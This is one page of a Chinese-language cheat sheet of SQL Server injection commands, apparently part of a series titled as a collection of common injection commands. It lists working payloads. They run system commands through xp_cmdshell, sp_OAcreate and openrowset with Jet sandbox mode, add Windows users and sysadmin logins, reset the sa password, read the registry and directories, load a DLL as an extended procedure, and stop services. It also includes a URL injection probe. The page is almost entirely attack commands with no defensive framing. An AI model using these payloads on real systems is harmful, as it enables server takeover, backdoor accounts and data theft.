//-----------------------
// 执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
REG_SZ
读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
数据库备份
backup database pubs to disk = 'c:\123.bak'
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
停掉或激活某个服务。
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
上一页 [1] [2] [3] 下一页
[推荐]阿D常用注入命令整理
您现在的位置: